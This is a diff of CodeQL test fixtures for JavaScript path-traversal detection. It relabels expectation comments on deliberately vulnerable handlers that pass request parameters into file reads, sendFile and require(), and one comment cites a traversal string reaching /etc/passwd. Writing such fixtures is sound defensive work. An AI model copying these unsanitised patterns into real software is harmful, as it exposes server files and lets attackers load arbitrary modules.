a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js 
@@ -10,21 +10,21 @@ let app = express(); app.get('/basic', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { let path = pathModule.normalize(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { 
@@ -33,21 +33,21 @@ app.get('/normalize-notAbsolute', (req, res) => { if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { @@ -56,16 +56,16 @@ app.get('/normalize-noInitialDotDot', (req, res) => { if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { @@ -73,9 +73,9 @@ app.get('/prepend-normalize', (req, res) => { let path = pathModule.normalize('./' + req.query.path); if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { 
@@ -84,10 +84,10 @@ app.get('/absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { @@ -96,10 +96,10 @@ app.get('/normalized-absolute', (req, res) => { if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK + res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { 
@@ -107,53 +107,53 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { let path = fs.realpathSync(req.query.path); - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { let path = pathModule.join('.', req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { let path = pathModule.join('/home/user/www', req.query.path); if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { let path = 'foo/' + pathModule.normalize(req.query.path); if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { 
@@ -162,12 +162,12 @@ app.get('/noDotDot', (req, res) => { if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { 
@@ -181,119 +181,119 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { let path = pathModule.normalize(req.query.path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + 
fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! 
+ fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); @@ -301,35 +301,35 @@ var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } 
@@ -338,34 +338,34 @@ app.get('/pseudo-normalizations', (req, res) => { app.get('/yet-another-prefix', (req, res) => { let path = pathModule.resolve(req.query.path); - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; 
@@ -376,56 +376,56 @@ import slash from 'slash'; app.get('/slash-stuff', (req, res) => { let path = req.query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', (req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..8d2bfe11feb7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -8,20 +8,20 @@ var http = require("http"), var server = http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { @@ -37,9 +37,9 @@ var util = require("util"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); 
@@ -48,37 +48,37 @@ const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..d3ee99d4974b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -4,11 +4,11 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..fa19da302606 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..aaa6cfdc2407 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js 
@@ -5,30 +5,30 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -37,7 +37,7 @@ var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -46,5 +46,5 @@ const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js 
@@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..e18e3c7e8bb1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -8,8 +8,8 @@ var server = http.createServer(function(req, res) { }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js 
@@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..9a200f2a4c99 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js 
@@ -4,25 +4,22 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..d705be16b317 100644 
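Review bot: The last line of this hunk, `res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/'`, keeps an ambiguous marker while every other expectation comment in this handler is rewritten to the `$ Alert` / `OK -` form. If unannotated lines are now read as expected-clean (the rest of this commit drops bare `// OK` markers, which suggests so), the expectation on this line is implicit and the remark no longer says which outcome the test asserts. I would make it explicit: `// OK - can only escape from 'data/'` if the query is expected to stay silent here, or `// $ Alert - can only escape from 'data/'` if it is expected to report the partial traversal. The enclosing `app.get('/some/path/:x', ...)` handler continues past the end of the hunk.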
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js 
@@ -4,28 +4,28 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); 
// $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..097bcc1fa117 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), function getTorrentData(dir, torrent){ let name = parseTorrent(torrent).name, loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..51549ea75658 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts 
